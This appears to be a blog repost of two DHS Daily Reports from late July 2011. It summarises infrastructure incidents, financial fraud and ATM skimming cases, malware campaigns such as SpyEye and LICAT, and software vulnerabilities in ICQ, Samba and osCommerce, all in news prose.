Friday, July 29, 2011

Complete DHS Daily Report for July 29, 2011

Daily Report

Top Stories

• A new survey of global oil and gas IT executives found only half of the respondents have put in place a strategy to address information security threats, according to Infosecurity. (See item 3)

3. July 27, Infosecurity – (International) Half of oil and gas companies have no information security strategy in place. Only half of oil and gas companies have put in place a strategy to address information security threats, according to a survey of oil and gas IT executives by IDC Energy Insights. The survey of global IT executives also found oil and gas companies still lag behind other industries in formulating, approving, and executing information security policies, as well as getting buy-in from senior management. Of the top three information security threats perceived by oil and gas companies, the greatest is state or industrial espionage, followed by employee error or accidental loss of sensitive information, and vulnerabilities owing to insecure code, the survey noted. In addition, 55 percent of survey respondents indicated an expected increase in their information security budget over the next 12 months. Only 10 percent of the respondents said they are using regulatory compliance as a requirement to justify budgets. In fact, almost 25 percent of respondents said the regulatory environment was a barrier to ensuring information security. Source:\

• A massive water main break in the Bronx in New York City closed major transportation routes, damaged 12 blocks of businesses and homes, and knocked out gas service to hundreds, WABC 7 New York reports. (See item 26)

26. July 28, WABC 7 New York – (New York) Bronx residents clean up after water main break. It could be days before life returns to normal at homes and businesses in the Bronx in New York City after a massive water main break. It happened on Jerome Avenue and East 177th street in Mount Hope July 27. The streets were dry late the morning of July 28, but big problems remained. There were ongoing bus disruptions, and 500 mom-and-pop shops and residential gas customers were waiting on Con Edison to hook service back up. Officials said all utility lines, including phone service, were affected in some way. And there's a 6-foot deep crater in the middle of the street and 12 blocks of water damage to repair after the geyser-like break turned one of the Bronx's busiest streets into a bubbling river. The break in the 108-year-old main sent tens of thousands of gallons of water gushing along Jerome Avenue. It took crews nearly 3 hours to shut it off because that main supplies water to the entire city. The entrance to the Cross Bronx Expressway had to be shut down, and No. 4 subway service was stopped in its tracks for hours. A day later, Jerome Avenue remained closed, littered with soggy debris dragged from flooded basements. People spent the day cleaning up and adding up their losses. But the biggest problem, aside from all the water damage, is that Con Ed has to go door to door to restore gas service to those 500 homes and businesses. And still, no one knows what exactly caused the century-old main to break. "We need to investigate this," a New York City Department of Environmental Protection representative said. "Age in and of itself is not a reason why a main of this size and strength would break." Service on the BX32 and BX36 bus lines remained detoured. Source:


Banking and Finance Sector

14. July 28, Assoicated Press – (New York) Man disguised as armored truck guard steals $15K from Queens check-cashing business. The New York City Police Department said a man dressed as an armored truck guard walked out of a check-cashing business with $15,000 in cash the week of July 18. Police said the suspect walked into Lorenzo's Enterprises in Queens, said he was there for a pickup and was handed the cash. They said he was wearing a GARDA Armored Courier uniform. The Daily News reported that workers at the check-cashing place did not suspect anything until an actual guard showed up hours later from the same armored truck company. The suspect remained at large as of July 27. Source:

15. July 27, New York Post – (New York) LI geezer bank bandit caught on tape. A hefty, gun-toting man who is believed to be responsible for a string of at least six bank robberies in New York since May is being hunted by Long Island cops, and the FBI. The squat, silver-haired bandit last struck July 26 at a Chase branch in Northport around 5:35 p.m. Armed with a black automatic gun, he approached a teller at bank at 721 Fort Salonga Road and demanded cash. The teller handed over the money and the subject fled on foot southbound through the parking lot. He is described as a white male in his 60s, 5 feet, 5 inches tall, and weighing 250 lbs. "We think he either has help, or parks a get-away car nearby," said the commanding officer of Nassau County's homicide and major crimes division. Cops believe the man is responsible for a similar bank robbery July 6 in Newburgh, New York, police said. Source:

16. July 27, San Diego Union-Tribune – (California) Alleged ID thief stole $200,000 in debit-card scam. An alleged identity thief was charged July 27 with looting more than $200,000 from customer accounts at a Rancho Penasquitos, California bank by using an electronic device to steal debit card information. The suspect is accused of stealing from about 950 customers at the Chase Bank branch on Black Mountain Road, but authorities said that number may go up if more victims come forward. He was arraigned before a San Diego Superior Court judge on 45 counts of identity theft, grand theft, burglary, making fake ID cards, and a special allegation that losses exceeded $200,000, the prosecutor said. She said charges related to about 900 more victims would be added against the man, a legal U.S. resident from Romania. He has a felony conviction for trying to break into an ATM in Los Angeles County in 2008, she said. Bank investigators discovered a man was installing a card-skimming device on the door of the bank’s ATM lobby every Saturday after closing time. He would remove it before the bank reopened on Mondays, a district attorney’s investigator said. This occurred for 6 weeks in a row. Hidden cameras the man is accused of installing showed customers typing their identification numbers on the ATM keypads. Agents believe he transferred the account information onto fake debit cards to withdraw $300, $500, even $1,000 at a time at other ATMs. The bank notified the Secret Service of the scam July 22. Agents, with San Diego police and the regional fraud task force, were watching the bank July 23 when the suspect returned to retrieve his device, and he was arrested. Source:

17. July 25, U.S. Department of Justice – (New York) Four charged with running a credit history repair scheme. The U.S. Attorney for the Southern District of New York and the U.S. Secret Service New York Field Office announced July 25 the unsealing of an indictment charging four people in connection with a fraudulent credit repair scheme. As part of the scheme, the defendants falsely reported to credit bureaus inflated credit histories for thousands of individuals, enabling those individuals to get millions of dollars in loans from financial institutions, and other lenders. From 2007 through 2009, through Highway Furniture Inc. and, later, New York Funding Group Inc., the four defendants engaged in a scheme to falsely and fraudulently improve credit histories and scores of thousands of people who purportedly were customers of the two firms. The individuals had never actually been customers of Highway Furniture, and New York Funding. As part of the scheme, in exchange for thousands of dollars in fees, the defendants provided credit bureaus with fictitious data showing their firms had extended credit to the purported customers, and that the loans had been or were being repaid. The defendants falsely and fraudulently improved credit histories and scores of some of the purported customers by deleting accurate, but negative, credit information maintained by credit bureaus. As a result, the purported customers obtained millions of dollars of loans from banks, and other lenders. Each defendant is charged with one count of conspiracy to commit bank fraud, and one count of conspiracy to cause damage to a protected computer. Source:

Information Technology Sector

37. July 28, Softpedia – (International) LiveJournal targeted in massive DDoS attack. LiveJournal experienced downtime during the past several days because of a massive distributed denial-of-service attack that overwhelmed the company's servers. The outages began July 26, but the company did not release a statement until July 27 when it confirmed it was the target of an attack. LiveJournal is one of the oldest blogging platforms, dating back to 1999, and has over 30 million registered accounts. LiveJournal appeared to be available as of July 28, but since the current attack is on-going, the service might experience more outages. Source:

38. July 28, Help Net Security – (International) Oracle Enterprise Manager Grid Control multiple vulnerabilities. Oracle reported its Enterprise Manager Grid Control has multiple problems. A remote issue in Security Framework can be exploited over the "HTTP" protocol. The "User Model" sub component is affected. A remote issue in EMCTL can be exploited over the "HTTP" protocol. A remote issue in CMDB Metadata & Instance APIs can be exploited over the "Oracle NET" protocol. A remote vulnerability in Database Control can be exploited over the "HTTP" protocol. Oracle Enterprise Manager Grid Control version,,,,,,, and are affected. Source:

39. July 28, Softpedia – (International) Fake IRS emails distribute new file infector variant. Security researchers from Trend Micro warn a wave of fake Internal Revenue Service e-mails direct recipients to a new variant of the LICAT file infecting virus. LICAT is a piece of malware associated with the zeus banking trojan that first appeared in October 2010. Malware analysts believe LICAT is intended as a distribution and update mechanism for zeus. The virus appends its rogue code to legitimate EXE, DLL, and HTML files. Each time one of the infected files is executed, a list of URLs is generated according to a predefined algorithm similar to the one used by Conficker. The zeus trojan normally updates itself from a list of predefined command and control servers. Losing control of these domain names usually means losing control of the entire botnet. LICAT adds a redundancy mechanism. It tries to access all of the generated URLs and downloads a new zeus version if it finds one. If they lose control of their C&C domains, the attackers can register a domain they know LICAT will generate in advance and upload their new version there, at which point all they need to do is wait. The rogue e-mails detected by Trend Micro purport to come from "Payment IRS(dot)gov" and bear a subject of "Internal Revenue Service United States Department of the Treasury." Source:

40. July 27, IDG News Service – (International) Beware of 'wrong transaction' hotel spam. A new spam campaign began to appear in recent days, and there are already hundreds of variants on the same theme: A hotel wrongly charged a credit card number, and the victim is supposed to fill out an attached form to process the refund. The "refund" form is actually a malicious trojan that installs fake antivirus software on the victim's computer, according to the director of research in computer forensics at the University of Alabama at Birmingham, who blogged about the spam messages July 27. The messages appear to be coming from the same botnet of infected computers that recently sent out similar messages warning victims their credit card payments were overdue. Those messages led to the fake antivirus downloads too, the researcher wrote in his blog post. As of late July 27, only 19 out of 43 antivirus products used by the VirusTotal Web site detected this latest trojan program. Source:

41. July 25, CNET News – (International) Street View cars grabbed locations of phones, PCs. Google's Street View cars collected the locations of millions of laptops, cell phones, and other Wi-Fi devices around the world, a practice that raises novel privacy concerns, CNET confirmed. The cars were supposed to collect the locations of Wi-Fi access points. However, Google also recorded the street addresses and unique identifiers of computers and other devices using those wireless networks, and then made the data publicly available through until several weeks ago. The French data protection authority, known as the Commission Nationale de l'Informatique et des Libertes, recently contacted CNET and said its investigation confirmed Street View cars collected these unique hardware IDs. Source:

Communications Sector

42. July 27, Winfield Daily Courier – (Kansas) Telephone service interrupted. Southern Kansas Telephone (SKT) customers in Cowley County and other towns in southeast Kansas have services back after one of SKT’s fiber optic lines was accidentally cut July 27. According to SKT's customer care director, at about 7:55 a.m. July 27, a construction company working near Belle Plaine was boring under a highway when they accidentally cut a fiber optic line that provides telephone, high-speed Internet, and cable television service to SKT customers in Belle Plaine and other communities in southeast Kansas, including Dexter, Burden, and Cedar Vale. SKT repair crews arrived onsite shortly after the cut to begin work on repairing the damaged fiber optic cable. Source:

43. July 27, Tallahassee Democrat – (Florida) Cable repairs have been completed. A cut cable north of Tallahassee, Florida, interrupted Comcast's television, Internet, and communications service to about 6,000 customers in that area, the company said July 27. Comcast's general manager said the line was a 78-count fiber optic cable that relays signals to customers along Thomasville Road and up to Bradfordville. Repair of the cable began within an hour of the reported outage hour. The above-ground cable was accidentally cut early July 27 by crews that were clearing tree limbs from the lines. Comcast finished the fiber optic cable repair at 3:20 p.m. Source:|newswell|text|FRONTPAGE|s

Thursday, July 28, 2011

Complete DHS Daily Report for July 28, 2011

Daily Report

Top Stories

• Trusteer reports the SpyEye bank-code stealing botnet doubled in size, reaching financial institutions in many more countries, according to IDG News Service. See item 23 below in the Banking and Finance Sector

• One of two remaining intact levees in Holt County, Missouri, is in danger of collapse and releasing flood waters on the town of Forbes and 10,000 acres of farmland, WDAF 4 Kansas City reports. (See item 61)

61. July 26, WDAF 4 Kansas City – (Missouri) Missouri River still threatens Holt County levees. Water levels along the flood-swollen Missouri River have begun to drop, but danger is not over for parts of northwest Missouri, where flood waters threaten one of two of the remaining intact levees in Holt County, WDAF 4 Kansas City reported July 26. In Fortescue, north of St. Joseph, the population shrunk from 51 to 2 due to flooding. Many corn fields in the area died after being underwater, and the remaining roads are largely unused. Levee Number 7 was in danger of collapse as crews have been working since the weekend of July 23 and 24 to repair a 50-foot hole gouged out by the river, with an additional 300 feet of damage on either side of the hole. The levee is protecting the town of Forbes and roughly 10,000 acres of farmland. "Found it 11 o'clock [July 23] morning, and started delivering rock by 8 o'clock that night," said one levee worker. Truckloads of rock were being dumped into the hole to save the levee. Source:,0,2125788.story


Banking and Finance Sector

19. July 26, Bloomberg – (International) TD Bank sued by trustee liquidating Rothstein law firm. Toronto-Dominion Bank (TD) was sued July 25 by the bankruptcy trustee liquidating Rothstein Rosenfeldt Adler PA for allegedly assisting in a $1.2 billion Ponzi scheme run by the Florida law firm’s former chairman. The chairman pleaded guilty in January 2010 to five counts of racketeering, money laundering, and wire fraud, admitting he sold investors interests in bogus settlements in fake sexual-harassment and whistleblower cases. The bank’s authorized agents let the man use its name, facilities, and accounts to deceive investors, the trustee said. He accused the bank of ignoring “red flags” and letting the lawyer open accounts and transfer ”huge sums” of money among them. “TD Bank played a central role in this massive fraud by giving [his] settlement program the appearance of legitimacy,” the trustee said in a filing July 25 in U.S. Bankruptcy Court in Fort Lauderdale, Florida. The firm collapsed after other attorneys there said they found evidence their chairman was running an illegal side business. TD Bank was a ”linchpin” in the scheme and disregarded numerous red flags, including hundreds of millions of dollars that moved out of law firm trust accounts, investors said in a complaint filed November 2009 in Florida state court. The investors accused the bank of breach of fiduciary duty, aiding and abetting fraud, and negligent misrepresentation. The investors, with more than $150 million in losses, seek “extensive relief” from the chairman and 27 co-conspirator defendants, according to court papers. Source:

20. July 26, Associated Press – (International) Ex-investment manager, known as Wall Street 'bad boy,' convicted of fraud. A former investment manager known as Wall Street's "bad boy" was convicted July 26 of defrauding U.S. and European investors of $140 million, promising them rich returns while blowing their money on a lifestyle that included private jets, home renovations, prostitutes, strippers, and classy London hotels. The verdict convicted him of conspiracy and securities fraud charges. The jury also convicted a co-defendant from Miami, Florida. The convicted fraudster was the former chief executive officer of the brokerage firm Sky Capital, which had offices in London, New York, Florida, and New Jersey. His co-defendant was a senior broker for the firm. The top charge, securities fraud, alone carries a potential sentence of up to 20 years in prison. Prosecutors portrayed the two defendants as con men, saying they capitalized on the excitement over Internet tech stocks by using their broker-dealer operation to solicit private investments in start-ups. Prosecutors said the defendants spent some of the investor money living lavishly with private jets, expensive vacations, fancy cars, and flashy watches. They said the men manipulated the value of stocks they sold to investors by paying brokers 400 percent commissions to promote the stocks. The scheme came to an end when one of the brokers was caught lying to an FBI undercover officer. Source:

21. July 26, KOMO 4 Seattle – (International) Police capture woman wanted in major ATM 'skimming' operation. Police may have cracked part of a major identity theft ring July 24 after a woman was caught placing a card "skimmer" on a bank ATM in Lynnwood, Washington. The 42-year-old woman was booked into jail for investigation of 20 counts of identify theft, and investigators said she is suspected in hundreds of similar cases, and has ties to an international organized crime group. According to court documents, an investigator with Chase Bank spotted the woman placing the skimmer on an ATM. Investigators said security camera video from the ATM showed the woman installing the skimmer. The bank investigator recognized the woman from numerous surveillance videos taken from ATMs affixed with skimmers from California to Mount Vernon, Washington, according to the documents. The woman is also the subject of a federal investigation into skimming and ID theft, and the Secret Service was called to interview her at Lynnwood police headquarters. In a statement of probable cause, police wrote the Secret Service believes the suspect has ties to organized crime in Romania, and is a flight risk if released. Chase has been investigating the woman since February, and has her on video placing skimmers on eight ATMs in the area, the court documents said. Those skimmers allegedly recorded the account information of at least 320 people. The bank investigator estimated the losses from the skimming at about $34,000. Source:

22. July 26, Associated Press – (Connecticut) Conn. man pleads guilty to swindling churchgoers. A Connecticut securities broker pleaded guilty July 26 to charges he swindled investors, including members of a Greek Orthodox church, out of more than $8 million. Federal authorities said the 51-year-old Easton man pleaded guilty to fraud and money laundering charges in U.S. district court in New Haven. Prosecutors said the man convinced officials and some parishioners at St. Barbara Greek Orthodox Church in Orange that he was an investment manager, and misrepresented his successes. Prosecutors have said church members lost retirement and college funds. Authorities said he used the money to support his auto racing businesses, and for personal bills. He will be sentenced in October. Source:

23. July 26, IDG News Service – (International) SpyEye Trojan defeating online banking defenses. Banks are facing more trouble from SpyEye, a piece of malicious software that steals money from people's online bank accounts, according to new research from security vendor Trusteer. In its latest versions, SpyEye has been modified with new code designed to evade advanced systems banks have put in place to block fraudulent transactions, said Trusteer's chief executive officer (CEO) Banks are now analyzing how a person uses their site, looking at parameters such as how many pages a person looks at, the amount of time a person spends on a page, and the time it takes a person to execute a transaction. Other indicators include IP address, such as if a person who normally logs in from the Miami, Florida area suddenly logs in from St. Petersburg, Russia. SpyEye works fast, and can automatically and quickly initiate a transaction much faster than an average person manually on the Web site, which provides a key trigger for banks to block a transaction. So SpyEye's authors are now trying to mimic — albeit in an automated way — how a real person would navigate a Web site. Trusteer has also noticed that SpyEye in recent months has expanded the number of financial institutions it is able to target in an increasing number of countries. New target countries include Russia, Saudi Arabia, Bahrain, Oman, Venezuela, Belarus, Ukraine, Moldova, Estonia, Latvia, Finland, Japan, Hong Kong, and Peru. What that means is that more criminal groups around the world are purchasing the SpyEye toolkit, Trusteer's CEO said. SpyEye is a botnet with a network of command-and-control servers hosted around the world. As of July 26, 46 command-and-control servers were online, according to SpyEye Tracker, a Web site dedicated to gathering statistics about the malicious software. In May, there were just 20 or so active servers responding to computers infected with SpyEye, said the site's administrator. Source:

Information Technology Sector

48. July 27, H Security – (International) ICQ vulnerable to account theft. In security advisories for ICQ and the ICQ Web site, a security researcher warned that the ICQ instant messenger for Windows and the ICQ Web site contain vulnerabilities that potentially allow attackers to take control of a user's ICQ account. According to the researcher, ICQ does not adequately check user's profile information and fails properly to analyze status messages, which can be freely chosen by users, to see if they contain executable code. He recently discovered a similar hole in the Skype client. If the victim opens the attacker's profile in the ICQ client or on the ICQ Web site, the embedded JavaScript code stored on the ICQ server will be executed. This can allow attackers to steal victims' cookies and take control of their sessions. The script code appears to be executed in a local context: therefore, attackers can potentially also execute applications and read the user's local files. Such an attack is called a persistent cross-site scripting attack; the attacker manages to place JavaScript code on a server that will be executed on the victim's machine when a particular Web site is visited, or a particular application is used. Source:

49. July 27, H Security – (International) Vulnerability in Samba SWAT tool. A cross site request forgery vulnerability and a related cross-site scripting vulnerability in the SWAT administration tool of the Samba SMB/CIFS and Windows interoperability software triggered the release of updates for versions 3.3, 3.4, and 3.5 of the software. With the request forgery problem, an attacker could trick an authenticated user into clicking a manipulated URL on a different Web page and gain control of SWAT. If that user is authenticated as the root user in the system, it is possible to start or stop the service and add or remove shares, printers, or user accounts. The SWAT tool has to be installed and enabled as either a stand-alone server or as an Apache CGI plug-in to be vulnerable. By default, SWAT is neither installed nor enabled. The cross-site scripting vulnerability only exists if the request forgery problem is not fixed, and allows an attacker to insert arbitrary content into the user field of the change password pages of SWAT. Source:

50. July 27, Softpedia – (International) osCommerce mass injection attack infects over 90K pages. Security researchers from Armorize came across a new mass injection attack targeting osCommerce Web sites that has already infected more than 90,000 pages. Attackers began by injecting a hidden iframe pointing to a malicious URL, but later switched to a rogue script element that loads a rogue JavaScript file from an external domain. The injected code does not appear to be obfuscated, so searching for it on Google revealed more than 90,000 hits, indicating the attack is widespread. Both versions of the injection take visitors through several redirects until landing them on a page that loads exploits for vulnerabilities in browser plug-ins and popular applications. This type of attack, known as a drive-by download, is very dangerous because it requires no user interaction and there is usually little to no indication that something malicious has happened. According to the Armorize researchers, this attack exploits vulnerabilities in Java (CVE-2010-0840 and CVE-2010-0886), Adobe Reader (CVE-2010-0188), Internet Explorer (CVE-2006-0003), and Windows XP (CVE-2010-1885). Since these vulnerabilities are relatively old, users who keep their software and operating system up to date should be protected against the attack. Source:

51. July 26, The Register – (International) Kit steals Mac login passwords through FireWire port. Software maker Passware released a program that quickly recovers log-in passwords from Macs, even when running Apple's new OS X Lion, that have been locked, put into sleep mode, or have FileVault disk encryption turned on. Passware Kit Forensic v11 works by capturing a Mac's computer memory over FireWire and extracting any log-in passwords that happen to be stored there. The package takes only a few minutes to work, and can also extract passwords stored on a Mac's keychain. The program exploits the peer-to-peer characteristic of the FireWire design, which allows any connected device to read and write to any other connected device. As a result, anything stored in a Mac's memory is accessible. Source:

Communications Sector

52. July 27, KMTR 16 Springfield – (Oregon) Phone service restored, suspect arrested. A man stealing wire from telephone lines was probably the cause of a telephone outage for about 1,000 residents of the Junction City, Oregon area July 26, according to the Lane County Sheriff’s Office. Phone service was restored by the evening of July 26 for most customers. Around 11:30 p.m., deputies investigating a report of a suspicious vehicle in a remote area of Bureau of Land Management land found a man who was apparently preparing to alter the appearance of some wire to make it easier to sell as scrap. Deputies arrested the 45-year-old man, and he was taken to jail on suspicion of theft, criminal mischief, and possession of methamphetamine. Source:

53. July 26, WKTV 2 Utica – (New York) Severe weather knocks Galaxy radio stations off the air. Galaxy Communications radio stations were off the air due to damage from severe weather the afternoon of July 26 that swept through Oneida County in New York. According to a spokesperson for the group of radio stations, WOUR, WKLL (KRock), WUMX (Mix 102.5), andESPN Radio (WTLB, WIXT, WRNY) were all off the air. It was also reported that Galaxy's facilities on Kellogg Road in Washington Mills suffered minor damage following the storm. The company said that all of their radio stations were expected to return to the airwaves the evening of July 26. Source: